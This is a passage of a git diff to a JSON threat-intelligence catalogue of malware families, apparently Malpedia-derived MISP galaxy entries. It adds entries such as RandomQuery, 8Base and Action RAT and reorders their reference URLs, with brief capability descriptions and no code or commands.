"https://securityaffairs.co/wordpress/128975/malware/hidden-c2-lampion-trojan-release-212.html", + "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/", + "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/" ], "synonyms": [], "type": [] @@ -11604,6 +12111,19 @@ "uuid": "93c87125-7150-4bc6-a0f9-b46ff8de1839", "value": "NodeJS Ransomware" }, + { + "description": "According to SentinelLabs, this is a VisualBasic-based malware that gathers system and file information and exfiltrates the data using InternetExplorer.Application or Microsoft.XMLHTTP objects.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.randomquery", + "https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "76fd3fcb-151d-4880-b97e-ea890c337aad", + "value": "RandomQuery" + }, { "description": "According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.", "meta": { @@ -11623,14 +12143,14 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.starwhale", "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html", + "https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html", "https://www.techrepublic.com/article/muddywater-targets-middle-eastern-and-asian-countries-in-phishing-attacks/", + "https://blog.talosintelligence.com/iranian-supergroup-muddywater/", "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", "https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html", - "https://blog.talosintelligence.com/iranian-supergroup-muddywater/", "https://www.govinfosecurity.com/iranian-apt-new-methods-to-target-turkey-arabian-peninsula-a-18706", - "https://rootdaemon.com/2022/03/10/iranian-hackers-targeting-turkey-and-arabian-peninsula-in-new-malware-campaign/", - "https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html" + "https://rootdaemon.com/2022/03/10/iranian-hackers-targeting-turkey-and-arabian-peninsula-in-new-malware-campaign/" ], "synonyms": [ "Canopy", @@ -11672,8 +12192,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_003", - "https://aaqeel01.wordpress.com/2021/01/18/docx-files-template-injection/", "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/", + "https://aaqeel01.wordpress.com/2021/01/18/docx-files-template-injection/", "https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt" ], "synonyms": [], @@ -11700,8 +12220,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_005", - "https://unit42.paloaltonetworks.com/trident-ursa/", - "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/" + "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/", + "https://unit42.paloaltonetworks.com/trident-ursa/" ], "synonyms": [], "type": [] @@ -11714,8 +12234,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_006", - "https://blogs.blackberry.com/en/2023/01/gamaredon-abuses-telegram-to-target-ukrainian-organizations", - "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/" + "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/", + "https://blogs.blackberry.com/en/2023/01/gamaredon-abuses-telegram-to-target-ukrainian-organizations" ], "synonyms": [], "type": [] @@ -11780,28 +12300,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.3cx_backdoor", - "https://www.fortinet.com/blog/threat-research/3cx-desktop-app-compromised", - "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack", - "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/", - "https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html", - "https://www.splunk.com/en_us/blog/security/splunk-insights-investigating-the-3cxdesktopapp-supply-chain-compromise.html", - "https://www.reversinglabs.com/blog/red-flags-fly-over-supply-chain-compromised-3cx-update", - "https://github.com/dodo-sec/Malware-Analysis/blob/main/SmoothOperator/SmoothOperator.md", - "https://www.cadosecurity.com/forensic-triage-of-a-windows-system-running-the-backdoored-3cx-desktop-app/", - "https://www.group-ib.com/blog/3cx-supply-chain-attack/?utm_source=twitter&utm_campaign=3cx-blog&utm_medium=social", - "https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html", "https://www.youtube.com/watch?v=fTX-vgSEfjk", - "https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/", - "https://www.zscaler.com/security-research/3CX-supply-chain-attack-analysis-march-2023", + "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack", + "https://www.cadosecurity.com/forensic-triage-of-a-windows-system-running-the-backdoored-3cx-desktop-app/", "https://blog.cyble.com/2023/03/31/a-comprehensive-analysis-of-the-3cx-attack", - "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/", "https://www.rapid7.com/blog/post/2023/03/30/backdoored-3cxdesktopapp-installer-used-in-active-threat-campaign/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack", "https://www.elastic.co/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack", - "https://research.openanalysis.net/3cx/northkorea/apt/triage/2023/03/30/3cx-malware.html#Functionality", + "https://www.group-ib.com/blog/3cx-supply-chain-attack/?utm_source=twitter&utm_campaign=3cx-blog&utm_medium=social", + "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/", "https://blogs.blackberry.com/en/2023/03/initial-implants-and-network-analysis-suggest-the-3cx-supply-chain-operation-goes-back-to-fall-2022", + "https://www.splunk.com/en_us/blog/security/splunk-insights-investigating-the-3cxdesktopapp-supply-chain-compromise.html", + "https://github.com/dodo-sec/Malware-Analysis/blob/main/SmoothOperator/SmoothOperator.md", + "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/", + "https://www.fortinet.com/blog/threat-research/3cx-desktop-app-compromised", + "https://www.reversinglabs.com/blog/red-flags-fly-over-supply-chain-compromised-3cx-update", + "https://research.openanalysis.net/3cx/northkorea/apt/triage/2023/03/30/3cx-malware.html#Functionality", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack", + "https://www.zscaler.com/security-research/3CX-supply-chain-attack-analysis-march-2023", "https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats", - "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/" + "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/", + "https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html", + "https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html", + "https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/" ], "synonyms": [ "SUDDENICON" @@ -11812,31 +12332,31 @@ "value": "3CX Backdoor (Windows)" }, { - "description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim’s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.", + "description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim\u2019s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://blogs.blackberry.com/en/2022/06/threat-thursday-unique-delivery-method-for-snake-keylogger", - "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--102", - "https://x-junior.github.io/malware%20analysis/2022/06/24/Snakekeylogger.html", "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter", + "https://www.youtube.com/watch?v=vzyJp2w8bPE", + "https://habr.com/ru/company/group-ib/blog/477198/", + "https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware/", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://twitter.com/James_inthe_box/status/1401921257109561353", + "https://cert.gov.ua/article/955924", + "https://www.cybereason.com/blog/threat-analysis-report-snake-infostealer-malware", + "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/", + "https://blogs.blackberry.com/en/2022/06/threat-thursday-unique-delivery-method-for-snake-keylogger", + "https://blog.netlab.360.com/purecrypter", + "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--102", + "https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/", + "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89", + "https://x-junior.github.io/malware%20analysis/2022/06/24/Snakekeylogger.html", "https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware", "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/", "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf", - "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89", - "https://www.cybereason.com/blog/threat-analysis-report-snake-infostealer-malware", - "https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware/", - "https://twitter.com/James_inthe_box/status/1401921257109561353", - "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/", - "https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/", - "https://cert.gov.ua/article/955924", - "https://blog.netlab.360.com/purecrypter", - "https://habr.com/ru/company/group-ib/blog/477198/", - "https://www.youtube.com/watch?v=vzyJp2w8bPE" + "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/" ], "synonyms": [ "404KeyLogger", @@ -11852,9 +12372,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.4h_rat", - "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html", "https://github.com/securitykitten/malware_references/blob/master/crowdstrike-intelligence-report-putter-panda.original.pdf", - "https://attack.mitre.org/groups/G0024" + "https://attack.mitre.org/groups/G0024", + "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html" ], "synonyms": [], "type": [] @@ -11862,6 +12382,20 @@ "uuid": "823f4eb9-ad37-4fab-8e69-3bdae47a0028", "value": "4h_rat" }, + { + "description": "Downloader used in suspected APT attack against Vietnam.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.5t_downloader", + "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/", + "https://kienmanowar.wordpress.com/2022/01/26/quicknote-analysis-of-malware-suspected-to-be-an-apt-attack-targeting-vietnam/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "685c9c30-aa9f-43ee-a262-43c17c350049", + "value": "5.t Downloader" + }, { "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", "meta": { @@ -11876,36 +12410,56 @@ "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", "value": "7ev3n" }, + { + "description": "The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in Summer of 2023. The group utilizes encryption paired with \u201cname-and-shame\u201d techniques to compel their victims to pay their ransoms. 8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries. Despite the high amount of compromises, the information regarding identities, methodology, and underlying motivation behind these incidents still remains a mystery. Samples of their ransomware show they are using customized Phobos with SmokeLoader.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.8base", + "https://krebsonsecurity.com/2023/09/whos-behind-the-8base-ransomware-website/", + "https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/", + "https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", + "https://twitter.com/rivitna2/status/1674718854549831681", + "https://socradar.io/dark-web-profile-8base-ransomware/", + "https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/", + "https://blog.bushidotoken.net/2023/05/unmasking-ransomware-using-stylometric.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7ee60640-29cd-4127-b805-1f2b753e9e15", + "value": "8Base" + }, { "description": "8T_Dropper has been used by Chinese threat actor TA428 in order to install Cotx RAT onto victim's machines during Operation LagTime IT. According to Proofpoint the attack was developed against a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. The dropper was delivered through an RTF document exploiting CVE-2018-0798.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper", - "https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/", - "https://community.riskiq.com/article/5fe2da7f", - "https://blog.malwarelab.pl/posts/on_the_royal_road/", "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf", + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0922.pdf", + "https://community.riskiq.com/article/5fe2da7f", + "https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/", + "https://blog.malwarelab.pl/posts/on_the_royal_road/", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://nao-sec.org/2021/01/royal-road-redive.html", + "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", + "https://malgamy.github.io/malware-analysis/The-Approach-of-TA413-for-Tibetan-Targets/#third-stage", + "https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", + "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf", + "https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf", + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", + "https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba", "https://tradahacking.vn/another-malicious-document-with-cve-2017-11882-839e9c0bbf2f", "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", - "https://securelist.com/cycldek-bridging-the-air-gap/97157/", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0922.pdf", - "https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba", - "https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf", - "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/", + "https://community.riskiq.com/article/56fa1b2f", "https://tradahacking.vn/l%C3%A0-1937cn-hay-oceanlotus-hay-lazarus-6ca15fe1b241", - "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/", - "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", - "https://malgamy.github.io/malware-analysis/The-Approach-of-TA413-for-Tibetan-Targets/#third-stage", - "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746", - "https://nao-sec.org/2021/01/royal-road-redive.html", - "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?", - "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf", - "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", - "https://community.riskiq.com/article/56fa1b2f" + "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/" ], "synonyms": [ "8t_dropper", @@ -11921,24 +12475,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf", - "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", - "https://www.secureworks.com/research/threat-profiles/bronze-keystone", - "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats", - "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", - "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-union", - "https://www.infopoint-security.de/medien/the-elderwood-project.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-express", - "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", + "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", + "https://www.infopoint-security.de/medien/the-elderwood-project.pdf", "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", - "https://www.secureworks.com/research/threat-profiles/bronze-firestone", - "https://attack.mitre.org/groups/G0001/", + "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", + "https://attack.mitre.org/groups/G0001/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", - "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", - "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn" + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf", + "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", + "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", + "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/" ], "synonyms": [ "HOMEUNIX", @@ -11969,11 +12523,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", - "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/", - "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", - "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software", + "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/", "https://www.carbonblack.com/2020/05/21/tau-technical-report-new-attack-combines-tinypos-with-living-off-the-land-techniques-for-scraping-credit-card-data/", - "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/" + "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software", + "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", + "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/" ], "synonyms": [ "PinkKite", @@ -12013,8 +12567,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader", - "https://github.com/Tlgyt/AbSent-Loader", - "https://twitter.com/cocaman/status/1260069549069733888" + "https://twitter.com/cocaman/status/1260069549069733888", + "https://github.com/Tlgyt/AbSent-Loader" ], "synonyms": [], "type": [] @@ -12041,9 +12595,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash", "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-atlas", - "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf" + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/" ], "synonyms": [], "type": [] @@ -12057,9 +12611,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox", "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html", + "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://unit42.paloaltonetworks.com/acidbox-rare-malware/", - "https://www.epicturla.com/blog/acidbox-clustering", - "https://securelist.com/apt-trends-report-q2-2020/97937/" + "https://www.epicturla.com/blog/acidbox-clustering" ], "synonyms": [ "MagicScroll" @@ -12094,6 +12648,19 @@ "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", "value": "Acronym" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.action_rat", + "https://www.seqrite.com/blog/double-action-triple-infection-and-a-new-rat-sidecopys-persistent-targeting-of-indian-defence" + ], + "synonyms": [], + "type": [] + }, + "uuid": "57df4c54-3fff-49dd-9657-19265a66f5de", + "value": "Action RAT" + }, { "description": "", "meta": { @@ -12109,12 +12676,12 @@ "value": "Adamantium Thief" }, { - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", - "https://twitter.com/JaromirHorejsi/status/813712587997249536", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016" + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016", + "https://twitter.com/JaromirHorejsi/status/813712587997249536" ], "synonyms": [], "type": [] @@ -12193,9 +12760,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita", - "https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md", + "https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html", "https://twitter.com/_CPResearch_/status/1201957880909484033", - "https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html" + "https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md" ], "synonyms": [], "type": [] @@ -12208,10 +12775,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agendacrypt", - "https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-uses-rust-to-target-more-vital-industries.html", "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/new-golang-ransomware-agenda-customizes-attacks/IOCs-blog-New%20Golang%20Ransomware%20Agenda%20Customizes%20Attacks.txt", + "https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-uses-rust-to-target-more-vital-industries.html", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", "https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html" ], "synonyms": [ @@ -12228,33 +12795,33 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz", - "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", + "https://unit42.paloaltonetworks.com/ironnetinjector/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://ryancor.medium.com/deobfuscating-powershell-malware-droppers-b6c34499e41d", "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", - "https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/", - "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", - "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://artemonsecurity.com/snake_whitepaper.pdf", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a", - "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", - "https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4", - "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat", - "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", - "https://docs.broadcom.com/doc/waterbug-attack-group", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", - "https://unit42.paloaltonetworks.com/ironnetinjector/", - "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", - "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", - "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a", - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://cdn.muckrock.com/foia_files/2021/02/16/21R019_RESPONSE.pdf", "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a", "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", - "https://ryancor.medium.com/deobfuscating-powershell-malware-droppers-b6c34499e41d" + 